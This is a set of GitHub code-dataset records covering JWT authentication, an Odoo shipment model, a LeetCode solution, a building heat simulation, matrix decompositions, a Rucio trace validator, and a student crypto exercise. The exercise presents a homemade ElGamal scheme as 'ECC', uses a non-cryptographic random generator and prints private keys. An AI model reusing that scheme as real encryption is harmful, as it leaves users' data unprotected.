id: str = payload.get('user_id')\n if id is None:\n raise credentials_exception\n token_data = {}\n token_data['user_id'] = id\n except JWTError:\n raise credentials_exception\n return token_data\n\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)) -> Users:\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED, detail='Unauthorized')\n try:\n token_data = verify_access_token(token, credentials_exception)\n except HTTPException:\n # an except clause needs an exception class, not the instance itself\n raise credentials_exception\n user = await Users.filter(id=token_data['user_id']).first()\n return user\n","repo_name":"Niatomi/kip-system","sub_path":"backend/src/auth/oauth2.py","file_name":"oauth2.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
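A minimal round-trip sketch for the JWT helpers above (editorial illustration; the secret and claims are made-up values, and python-jose must be installed):

from jose import jwt

SECRET = "change-me"  # hypothetical secret, not the app's real config
token = jwt.encode({"user_id": 42}, SECRET, algorithm="HS256")
claims = jwt.decode(token, SECRET, algorithms=["HS256"])
assert claims["user_id"] == 42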
+{"seq_id":"71294722237","text":"\nfrom odoo import models, fields, api\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n picking_ids = fields.One2many('stock.picking', 'bill_id', string='Stock Picking')\n shipment_count = fields.Integer(string='Shipment', compute='_compute_picking_ids')\n\n @api.multi\n def create_shipment(self, force=False):\n print('create_shipment')\n voucher_move_lines = self.invoice_line_ids.filtered(lambda m: m.product_id.id)\n location_bill = self.operating_unit_id.picking_type_id.default_location_src_id\n location_dest_bill = self.operating_unit_id.picking_type_id.default_location_dest_id\n picking_type_bill_id = self.operating_unit_id.picking_type_id\n vals={\n 'location_id': location_bill.id,\n 'location_dest_id': location_dest_bill.id,\n 'picking_type_id': picking_type_bill_id.id,\n 'bill_id': self.id,\n }\n print('vals :',vals)\n picking_id = self.env['stock.picking'].create(vals)\n for line in voucher_move_lines:\n vals_invoice_line = {\n 'picking_id': picking_id.id,\n 'product_id': line.product_id.id,\n 'name': line.name,\n 'product_uom_qty': line.quantity,\n 'product_uom': line.uom_id.id,\n 'location_id': location_bill.id,\n 'location_dest_id': location_dest_bill.id,\n 'remaining_qty': line.quantity,\n }\n print('vals_invoice_line :', vals_invoice_line)\n move_id = self.env['stock.move'].create(vals_invoice_line)\n\n @api.depends('picking_ids')\n def _compute_picking_ids(self):\n for order in self:\n order.shipment_count = len(order.picking_ids)\n\n @api.multi\n def action_view_shipment(self):\n '''\n This function returns an action that displays existing delivery orders\n of given sales order ids. It can either be in a list or in a form\n view, if there is only one delivery order to show.\n '''\n action = self.env.ref('stock.action_picking_tree_all').read()[0]\n\n pickings = self.mapped('picking_ids')\n if len(pickings) > 1:\n action['domain'] = [('id', 'in', pickings.ids)]\n elif pickings:\n action['views'] = [(self.env.ref('stock.view_picking_form').id, 'form')]\n action['res_id'] = pickings.id\n return action","repo_name":"support-itaas/app_shop","sub_path":"itaas_vendor_create_shipment/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"9793802963","text":"from typing import List\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:\n M = len(obstacleGrid)\n N = len(obstacleGrid[0])\n if obstacleGrid[0][0] == 1:\n return 0 # starting cell blocked: no path exists\n memory = [[0] * N for _ in range(M)]\n memory[0][0] = 1\n for i in range(M):\n if obstacleGrid[i][0] != 1:\n memory[i][0] = 1\n else:\n break\n for j in range(N):\n if obstacleGrid[0][j] != 1:\n memory[0][j] = 1\n else:\n break\n for i in range(1, M):\n for j in range(1, N):\n if obstacleGrid[i][j] == 1:\n continue\n else:\n memory[i][j] = memory[i-1][j] + memory[i][j-1]\n return memory[M-1][N-1]","repo_name":"wywlds/leetcode","sub_path":"page2/leet63_different_paths.py","file_name":"leet63_different_paths.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"70516840637","text":"import json\n\njson_data = input()\nkeys=input().split(' ')\n\n# {\n# \"key\":\"value\",\n# \"name\": \"Juan Daniel\",\n# \"age\": 26\n# }\n\ndata = json.loads(json_data)\nresult = [0, '']\n\nfor key in keys:\n try:\n result[0] += data[key]\n result[1] += key + ' '\n except (KeyError, TypeError):\n pass # skip keys that are missing or hold non-numeric values\n\nprint(result[0])\nprint(result[1])","repo_name":"jdrios-dev/MinTic","sub_path":"retos/reto4.py","file_name":"reto4.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
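A minimal sketch (editorial illustration; data and keys are stand-ins, not taken from the record above) of the same sum-the-present-keys logic written without exception handling:

data = {"key": "value", "name": "Juan Daniel", "age": 26}
keys = ["age", "height", "name"]

numeric = {k: v for k, v in data.items() if isinstance(v, (int, float))}
found = [k for k in keys if k in numeric]
print(sum(numeric[k] for k in found))  # 26
print(" ".join(found))                 # age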
+{"seq_id":"37879331750","text":"\"\"\"Script to test 2-mass-building model\"\"\"\n\nfrom bamLoadBasedTesting.BuildingModels import BAM_RRT_MT\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Create new building model:\nBuilding = BAM_RRT_MT.MTBui_E\nstepSize = 0.5\nT_b = []\nT_H = []\nT_ret = []\nq_flow_hp = []\nq_flow_hb = []\nq_flow_ba = []\nq_flow_bh = []\nq_flow_int = []\nt = []\nt_sup = []\ninternalGains = 0 # 0 W constant internal gains into building\n# loop over the simulation steps\nfor x in range(3600*3):\n t.append(x * stepSize)\n # Step response\n if x<3600:\n t_sup.append(52)\n else:\n t_sup.append(Building.t_ret)\n T_ret.append(Building.t_ret)\n # Do step with Building Model\n Building.doStep(t_sup=t_sup[-1], t_ret_mea=T_ret[-1], m_dot=720/3600, stepSize=stepSize, q_dot_int=internalGains)\n # Save current values:\n T_b.append(Building.MassB.T)\n T_H.append(Building.MassH.T)\n q_flow_ba.append(Building.q_dot_ba)\n q_flow_hb.append(Building.q_dot_hb)\n q_flow_hp.append(Building.q_dot_hp)\n q_flow_int.append(Building.q_dot_int)\n q_flow_bh.append(Building.q_dot_bh)\n\nhours = np.array(t)\nhours = hours/3600\nfig, ax = plt.subplots()\nax.plot(hours, T_ret, label = \"return temperature\")\nax.plot(hours, T_H, label = 'transfer system temperature')\nax.plot(hours, t_sup, label = 'supply temperature')\nax.legend()\nplt.grid(True)\nplt.ylabel('[°C]')\nplt.xlabel('time in hours')\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(hours, q_flow_hp, label = 'heat flow heat pump --> heating system ')\nax.plot(hours, q_flow_hb, label = 'heat flow transfer --> building')\nax.plot(hours, q_flow_ba, label = 'heat flow Building --> Ambient')\nax.plot(hours, q_flow_int, label = 'heat flow internal gains --> building')\nax.plot(hours, q_flow_bh, label = 'heat flow booster heater --> heating system')\nax.legend()\nplt.ylabel('[W]')\nplt.xlabel('time in hours')\nplt.grid(True)\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(hours, T_b, label = 'building temperature')\nax.legend()\nplt.ylabel('[°C]')\nplt.xlabel('time in hours')\nplt.grid(True)\nplt.show()","repo_name":"BAMresearch/bam-load-based-testing","sub_path":"bamLoadBasedTesting/Example/testModelSim.py","file_name":"testModelSim.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
+{"seq_id":"42564475104","text":"#coding:utf-8\n__author__ = 'jmh081701'\nimport numpy as np\nimport copy\nimport sys\n\nnp.set_printoptions(precision=3,suppress=True)\ndef print_matrix(mat):\n shape=np.shape(mat)\n for i in range(shape[0]):\n for j in range(shape[1]):\n print(round(mat[i,j],3),end=\"\\t\")\n print(end=\"\\n\")\n\ndef LU_decompose(mat):\n mat=copy.deepcopy(mat)\n shape = np.shape(mat)\n if shape[0]!=shape[1]:\n print(\"The matrix is not a square matrix, which cannot be LU decomposed.\")\n return None,None,None\n P=np.zeros(shape)\n U=np.eye(shape[0])\n L=np.eye(shape[0])\n per=[i for i in range(shape[0])] # bookkeeping for the row permutation\n for i in range(shape[0]):\n # if the pivot is 0 we need to swap rows\n j_max=i\n for j in range(i+1,shape[0]):\n if mat[j,i] != 0:\n # search downward for the nonzero pivot with the largest absolute value and swap it up\n if abs(mat[j,i]) > abs(mat[j_max,i]):\n j_max = j\n\n tmp = copy.deepcopy(mat[i,:])\n mat[i,:] = copy.deepcopy(mat[j_max,:])\n mat[j_max,:] = tmp\n # swap the permutation record as well\n tmp = per[i]\n per[i]=per[j_max]\n per[j_max]=tmp\n if mat[i,i]==0:\n print(\"This matrix is singular, which cannot be decomposed\")# cannot be LU decomposed\n return None,None,None\n for j in range(i+1,shape[0]):\n if mat[j,i]!=0:\n factor = mat[j,i]/mat[i,i]\n mat[j,i:]=mat[j,i:]-factor * mat[i,i:]\n mat[j,i]=factor\n else:\n continue\n # build the result\n # the P matrix\n for i in range(shape[0]):\n P[i,per[i]]=1\n # the L matrix\n for i in range(shape[0]):\n U[i,i:]=mat[i,i:]\n if i>0:\n L[i,0:i]=mat[i,0:i]\n print(\"LU decompose result.\")\n print('P:')\n print_matrix(P)\n print(\"L:\")\n print_matrix(L)\n print(\"U:\")\n print_matrix(U)\n return np.asmatrix(P),np.asmatrix(L),np.matrix(U)\ndef QR_decompose(mat):\n mat =copy.deepcopy(mat)\n mat = np.asmatrix(mat,dtype=np.float)\n shape = np.shape(mat)\n R= np.eye(shape[1])\n for column in range(shape[1]):\n for i in range(column):\n mat[:,column] = np.asmatrix(mat[:,column])\n project =np.float( (mat[:,i]).T * mat[:,column])\n R[i,column] =project\n for row in range(shape[0]):\n mat[row,column] -=project * mat[row,i]\n\n mat[:,column]=np.asmatrix(mat[:,column])# convert to a matrix first\n magnitude=np.float(np.sqrt((mat[:,column]).T * mat[:,column]))\n if magnitude==0:\n print(\"This Matrix cannot be QR decomposed.\")\n return None,None,None\n for row in range(shape[0]):\n mat[row,column] /=magnitude\n R[column,column]=magnitude\n print(\"QR decompose result.\")\n print(\"Q:\")\n print_matrix(mat)\n print('R:')\n print_matrix(R)\n return np.asmatrix(mat),np.asmatrix(R)\n\ndef HouseholderReduction(mat):\n mat = np.asmatrix(mat,dtype=np.float)\n shape = mat.shape\n R=np.eye(shape[0])\n T=np.zeros(shape=shape)\n for i in range(shape[0]):\n submat = np.asmatrix(mat[i:,i:])\n # take out the first column\n x= np.asmatrix(submat[:,0])\n if(x.shape[0]==1):\n continue\n u=copy.deepcopy(x)\n u[0,0]-=np.sqrt(np.float(x.T * x)) #\n print(u.T *u)\n _Ri=np.eye(u.shape[0])-2*u*u.T/(np.float(u.T * u))\n Ri=np.eye(shape[0])\n Ri[i:,i:]=_Ri\n Ri= np.asmatrix(Ri)\n R =Ri *R\n mat=np.asmatrix(mat)\n mat=Ri * mat\n print(\"Householder Reduction result.\")\n print('P:')\n print_matrix(R.T)\n print('T:')\n print_matrix(mat)\n return np.asmatrix(R,dtype=np.float),np.asmatrix(mat,dtype=np.float)\ndef GivensReduction(mat):\n mat = np.asmatrix(mat,dtype=np.float)\n shape = mat.shape\n P=np.eye(shape[0])\n T=np.zeros(shape=shape)\n for i in range(shape[0]):\n column= np.asmatrix(mat[:,i])\n # take out the i-th column\n if(column.shape[0]==1):\n # the i-th column has only one element left, no need to reduce further\n continue\n u=copy.deepcopy(column)\n for row in range(i+1,shape[0]):\n mag=np.sqrt((u[row,0]**2+u[i,0]**2))\n if(mag)==0:\n # the entry is already 0, no reduction needed\n continue\n c=u[i,0] / mag\n s=u[row,0]/mag\n Pi=np.eye(shape[0])\n Pi[i,i]=c\n Pi[row,row]=c\n Pi[i,row]=s\n Pi[row,i]=-s\n Pi = np.asmatrix(Pi)\n P=Pi*P\n u=Pi*u\n mat=np.asmatrix(mat)\n mat=Pi*mat\n print(\"Givens Reduce result.\")\n print('P')\n print_matrix(P.T)\n print('T')\n print_matrix(mat)\n return np.asmatrix(P,dtype=np.float),np.asmatrix(mat,dtype=np.float)\nif __name__ == '__main__':\n #A=np.asmatrix([[0,-20,-14],[3,27,-4],[4 ,11,-2]])\n #HouseholderReduction(A)\n while True:\n print(\">============================================<\")\n cmd = input(\"please select one of these four methods:\\n LU(1)\\t QR(2)\\t HouseHolder Reduction(3)\\t Givens Reduction(4) End(5):\")\n func=None\n if \"1\" in cmd:\n print(\"You selected the LU decomposition method.\")\n func=LU_decompose\n elif \"2\" in cmd:\n print(\"You selected the QR decomposition method.\")\n func=QR_decompose\n elif \"3\" in cmd:\n print(\"You selected the Householder Reduction method.\")\n func=HouseholderReduction\n elif \"4\" in cmd:\n print(\"You selected the Givens Reduction method.\")\n func=GivensReduction\n elif \"5\" in cmd:\n print(\"Bye···\"*3)\n break\n else:\n print(\"Unknown command.\")\n continue\n row_size=input(\"Please input the matrix size(for example 4 4)\\n\\trow size:\")\n col_size=input(\"\\tcol size:\")\n mat=[]\n row_size=int(row_size)\n col_size=int(col_size)\n for i in range(row_size):\n raw_row=input(\"The %d row, each entry separated by a space:\"%i)\n row = raw_row.split(\" \")\n row = [float(each) for each in row]\n mat.append(row)\n mat = np.asmatrix(mat,dtype=np.float)\n func(mat)","repo_name":"jmhIcoding/matrix","sub_path":"decomposition.py","file_name":"decomposition.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"}
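A quick numerical check for the LU routine above (editorial sketch; it assumes decomposition.py's LU_decompose is importable in the current scope):

import numpy as np

A = np.asmatrix([[0., 1.], [2., 3.]])  # zero pivot forces a row swap
P, L, U = LU_decompose(A)
assert np.allclose(P * A, L * U)  # the defining identity P*A = L*U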
+{"seq_id":"39532904341","text":"##### Asymmetric Encryption/Decryption using Modern Algorithms ######\n'''\n### Asymmetric Encryption\n# ECC (Elliptic Curve Cryptography): TYPICALLY USED FOR DIGITAL SIGNATURES!!!!!\n\n\tECC is based on mathematical operations involving elliptic curves over finite fields.\n\n\tThe public key in ECC is generated as a point on the elliptic curve, and the private key is an integer.\n\n\tThe security of ECC rests on the discrete logarithm problem over an elliptic curve, which is considered harder to solve\n\t compared with similar problems over other fields. ECC offers security equivalent to RSA with much smaller keys, \n\t making it an attractive choice for devices with limited resources.\n\nDirect Encryption: El Gamal\n\tBob generates public and private keys: \n\tBob chooses a very large number q and a cyclic group Fq.\n\tFrom the cyclic group Fq, he chooses any element g and\n\tan element a such that gcd(a, q) = 1.\n\tThen he computes h = g^a.\n\tBob publishes F, h = g^a, q, and g as his public key and retains a as private key.\nAlice encrypts data using Bob's public key : \n\tAlice selects an element k from cyclic group F \n\tsuch that gcd(k, q) = 1.\n\tThen she computes p = g^k and s = h^k = g^(ak).\n\tShe multiplies s by M.\n\tThen she sends (p, M*s) = (g^k, M*s).\nBob decrypts the message : \n\tBob calculates s' = p^a = g^(ak).\n\tHe divides M*s by s' to obtain M as s = s'.\n'''\n\nfrom fastecdsa import keys, curve,ecdsa\nimport random \nfrom math import gcd  # importing pow from math would shadow the built-in three-argument pow()\n\n### ECC (implementation)\n\n'''\nSources:\nhttps://medium.com/@schaetzcornelius/learn-how-to-code-elliptic-curve-cryptography-be646d2c9757\nhttps://www.geeksforgeeks.org/elgamal-encryption-algorithm/\nhttps://www.geeksforgeeks.org/blockchain-elliptic-curve-cryptography/ \n'''\n\n\n# ---------------===============----------------=================--------------------========---------------\n# This is the digital signature application\npriv_key, pub_key = keys.gen_keypair(curve.P256)\n\nmessage = 'Method KISS slaps'\n(r,s) = ecdsa.sign(message,priv_key) # generates a signature (r, s) with the private key\n\nvalid = ecdsa.verify((r,s),message,pub_key) # Verifies that the signature matches the public key (without accessing the private key)\nif valid == True:\n\tprint(f'\\033[1;32m{valid}\\033[m')\nif not valid == True:\n\traise Exception('The private key does not belong to the owner of this public key!')\nprint('-=-' * 20)\n# ---------------===============-----------------================-----------------=============-------------\n\n# Direct encryption using El Gamal\nclass ECCCipher(object):\n\n\tdef __init__(self, ar=2, op=10):\n\t\tself.a = random.randint(ar, op)
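# Editor's note (illustrative sketch with toy numbers, not part of the
# original record): the El Gamal round-trip implemented below can be checked
# with plain modular arithmetic:
#
#   q, g, a, k = 467, 2, 153, 197        # toy public/private values
#   h = pow(g, a, q)                     # receiver publishes h = g^a
#   p, s = pow(g, k, q), pow(h, k, q)    # sender's p = g^k, shared s = g^(ak)
#   c = (123 * s) % q                    # encrypt m = 123
#   assert (c * pow(pow(p, a, q), -1, q)) % q == 123  # decrypt (Python 3.8+)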
\n\n\tdef gcd_(self, a, b):\n\t\t'''\n\t\tProcess described in the comment at the top\n\t\t'''\n\t\tif a < b:\n\t\t\treturn gcd(b, a)\n\t\telif a % b == 0:\n\t\t\treturn b\n\t\telse:\n\t\t\treturn gcd(b, a % b)\n\t\t\n\t# generating large random numbers\n\tdef gen_key(self, q):\n\t\tkey = random.randint(pow(10, 20), q)\n\t\twhile self.gcd_(q, key) != 1:\n\t\t\tkey = random.randint(pow(10, 20), q)\n\t\treturn key\n\t\n\tdef power(self, a, b, c):\n\t\t'''\n\t\tProcess described in the comment at the top\n\t\t'''\n\t\tx = 1\n\t\ty = a\n\t\twhile b > 0:\n\t\t\tif b % 2 != 0:\n\t\t\t\tx = (x * y) % c\n\t\t\ty = (y * y) % c\n\t\t\tb = int(b / 2)\n\t\treturn x % c\n\t\n\tdef encrypt(self, msg): # (q, g, h) --> public key \n\t\t\n\t\tq = random.randint(pow(10, 20), pow(10, 50))\n\t\tg = random.randint(2, q)\n\t\tprint(f'original text: {msg}')\n\t\t#print(f'q used = {q}')\n\t\t#print(f'g used = {g}')\n\t\tkey = self.gen_key(q) # private key for the receiver\n\t\th = self.power(g, key, q) # g^a\n\t\t#print(f'g^a (h) used = {h}')\n\n\n\t\ten_msg = []\n\t\n\t\tk = self.gen_key(q) # private key for the sender\n\t\ts = self.power(h, k, q)\n\t\tp = self.power(g, k, q)\n\t\t\n\t\tfor i in range(0, len(str(msg))):\n\t\t\ten_msg.append(str(msg)[i])\n\t\n\t\t#print(\"g^k (p) used =\", p)\n\t\t#print(\"g^ak (s) used =\", s)\n\t\tprint(f'private key (sender): {k}')\n\t\tprint(f'private key (receiver): {key}')\n\t\tfor i in range(0, len(en_msg)):\n\t\t\ten_msg[i] = s * ord(en_msg[i])\n\n\t\tpublic_key = [p, q]\n\t\tprint(f'public key = {public_key}')\n\t\n\t\treturn en_msg, public_key, key\n\n\tdef decrypt(self, en_msg, public_key, key):\n\t\n\t\tdr_msg = []\n\t\th = self.power(public_key[0], key, public_key[1]) # p^a = g^(ak)\n\t\tfor i in range(0, len(en_msg)):\n\t\t\tdr_msg.append(chr(int(en_msg[i]/h)))\n\t\tdmsg = ''.join(dr_msg)\n\t\treturn dmsg\n\nif __name__ == '__main__':\n\t# ECC tester\n\tmensagem = 1234.132124\n\t\n\tecc1 = ECCCipher(2, 10)\n\t#ECCaply = ecc1.ElGamal(mensagem)\n\tencryption, public_key, key = ecc1.encrypt(mensagem)\n\tdecryption = ecc1.decrypt(encryption, public_key, key)\n\tprint('-=-'*20)\n\tprint(f'decrypted message: {decryption}')\n\t# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n","repo_name":"MrNick-code/Projeto_Computacional-grupo_2","sub_path":"Old_Codes/cripto_assimetrica.py","file_name":"cripto_assimetrica.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"}
+{"seq_id":"32189241993","text":"import ipaddress\nimport json\nimport logging.handlers\nimport random\nimport socket\n\nimport stomp\nfrom jsonschema import validate, ValidationError, Draft7Validator\n\nfrom rucio.common.config import config_get, config_get_int\nfrom rucio.common.exception import InvalidObject\nfrom rucio.common.logging import rucio_log_formatter\nfrom rucio.common.schema.generic import UUID, TIME_ENTRY, IPv4orIPv6\nfrom rucio.core.monitor import MetricManager\n\nMETRICS = MetricManager(module=__name__)\n\nCONFIG_COMMON_LOGLEVEL = getattr(logging, config_get('common', 'loglevel', raise_exception=False, default='DEBUG').upper())\n\nCONFIG_TRACE_LOGLEVEL = getattr(logging, config_get('trace', 'loglevel', raise_exception=False, default='DEBUG').upper())\nCONFIG_TRACE_LOGFORMAT = config_get('trace', 'logformat', raise_exception=False, default='%(message)s')\nCONFIG_TRACE_TRACEDIR = config_get('trace', 'tracedir', raise_exception=False, default='/var/log/rucio/trace')\nCONFIG_TRACE_MAXBYTES = 
config_get_int('trace', 'maxbytes', raise_exception=False, default=1000000000)\nCONFIG_TRACE_BACKUPCOUNT = config_get_int('trace', 'backupCount', raise_exception=False, default=10)\n\n# reset root logger handlers. Otherwise everything from ROTATING_LOGGER will also end up in the apache logs.\nlogging.getLogger().handlers = []\n\nLOGGER = logging.getLogger('trace')\nLOGGER.setLevel(CONFIG_COMMON_LOGLEVEL)\n\nROTATING_LOGGER = logging.getLogger('trace_buffer')\nROTATING_LOGGER.setLevel(CONFIG_TRACE_LOGLEVEL)\n\nHANDLER = logging.StreamHandler()\nFORMATTER = rucio_log_formatter()\nHANDLER.setFormatter(FORMATTER)\nLOGGER.addHandler(HANDLER)\n\nROTATING_HANDLER = logging.handlers.RotatingFileHandler(filename='%s/trace' % CONFIG_TRACE_TRACEDIR, maxBytes=CONFIG_TRACE_MAXBYTES, backupCount=CONFIG_TRACE_BACKUPCOUNT)\nROTATING_LOGFORMATTER = logging.Formatter(CONFIG_TRACE_LOGFORMAT)\nROTATING_HANDLER.setFormatter(ROTATING_LOGFORMATTER)\nROTATING_LOGGER.addHandler(ROTATING_HANDLER)\n\nBROKERS_ALIAS, BROKERS_RESOLVED = [], []\ntry:\n BROKERS_ALIAS = [b.strip() for b in config_get('trace', 'brokers').split(',')]\nexcept:\n raise Exception('Could not load brokers from configuration')\n\nPORT = config_get_int('trace', 'port')\nTOPIC = config_get('trace', 'topic')\nUSERNAME = config_get('trace', 'username')\nPASSWORD = config_get('trace', 'password')\nVHOST = config_get('trace', 'broker_virtual_host', raise_exception=False)\n\nTOUCH_SCHEMA = {\n \"description\": \"touch one or more DIDs\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"touch\"]},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['eventType', 'clientState', 'account', 'traceTimeentry', 'traceTimeentryUnix', 'traceIp', 'traceId']\n}\n\nUPLOAD_SCHEMA = {\n \"description\": \"upload method\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"upload\"]},\n \"hostname\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"uuid\": UUID,\n \"scope\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"remoteSite\": {\"type\": \"string\"},\n \"filesize\": {\"type\": \"number\"},\n \"protocol\": {\"type\": \"string\"},\n \"transferStart\": {\"type\": \"number\"},\n \"transferEnd\": {\"type\": \"number\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"vo\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['hostname', 'account', 'eventType', 'eventVersion', 'uuid', 'scope', 'dataset',\n 'remoteSite', 'filesize', 'protocol', 'transferStart', 'traceTimeentry', 'traceTimeentryUnix',\n 'traceIp', 'traceId']\n}\n\nDOWNLOAD_SCHEMA = {\n \"description\": \"download method\",\n \"type\": \"object\",\n 
\"properties\": {\n \"eventType\": {\"enum\": [\"download\"]},\n \"hostname\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"uuid\": UUID,\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"filesize\": {\"type\": [\"number\", \"null\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"protocol\": {\"type\": \"string\"},\n \"transferStart\": {\"type\": \"number\"},\n \"transferEnd\": {\"type\": \"number\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"vo\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n },\n \"required\": ['hostname', 'eventType', 'localSite', 'account', 'eventVersion', 'uuid', 'scope',\n 'filename', 'datasetScope', 'dataset', 'filesize', 'clientState', 'stateReason']\n}\n\nGET_SCHEMA = {\n \"description\": \"get method, mainly sent by pilots\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"get\", \"get_sm\", \"sm_get\", \"get_sm_a\", \"sm_get_a\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"url\": {\"type\": [\"string\", \"null\"]},\n \"vo\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": \"string\"},\n \"dataset\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['eventType', 'localSite', 'eventVersion', 'uuid', 'scope',\n 'filename', 'dataset']\n}\n\nPUT_SCHEMA = {\n \"description\": \"get method, mainly sent by pilots\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"put_sm\", \"put_sm_a\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"url\": {\"type\": [\"string\", \"null\"]},\n \"vo\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": \"string\"},\n \"dataset\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"usrdn\": {\"type\": \"string\"},\n \"pq\": {\"type\": \"string\"},\n \"localSite\": {\"type\": \"string\"}\n },\n \"required\": ['eventType', 'localSite', 'eventVersion', 'uuid',\n 'filename', 'dataset']\n}\n\nSPECIAL_SCHEMA = {\n \"description\": \"A special schema to capture most unsupported eventTypes\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"sfo2eos\"]},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"traceTimeentry\": 
TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['eventType', 'clientState', 'account', 'traceTimeentry', 'traceTimeentryUnix', 'traceIp', 'traceId']\n}\n\nSCHEMAS = {\n 'touch': TOUCH_SCHEMA,\n 'upload': UPLOAD_SCHEMA,\n 'download': DOWNLOAD_SCHEMA,\n 'get': GET_SCHEMA,\n 'get_sm': GET_SCHEMA,\n 'sm_get': GET_SCHEMA,\n 'get_sm_a': GET_SCHEMA,\n 'sm_get_a': GET_SCHEMA,\n 'put': PUT_SCHEMA,\n 'put_sm': PUT_SCHEMA,\n 'put_sm_a': PUT_SCHEMA,\n 'sm_put': PUT_SCHEMA,\n 'sm_put_a': PUT_SCHEMA,\n 'sfo2eos': SPECIAL_SCHEMA\n}\n\nFORMAT_CHECKER = Draft7Validator.FORMAT_CHECKER\n\n\n@FORMAT_CHECKER.checks(format=\"ipv4_or_ipv6\")\ndef ip_format_checker(value: str) -> bool:\n \"\"\"\n Validates IPv4 or IPv6 string values. json schemas can use `ipv4_or_ipv6` as a valid `format` argument\n \"\"\"\n try:\n ipaddress.ip_address(value)\n except ValueError:\n LOGGER.debug(f\"{value} is not a valid IPv4 or IPv6 address and raises an errors upon validation.\")\n result = 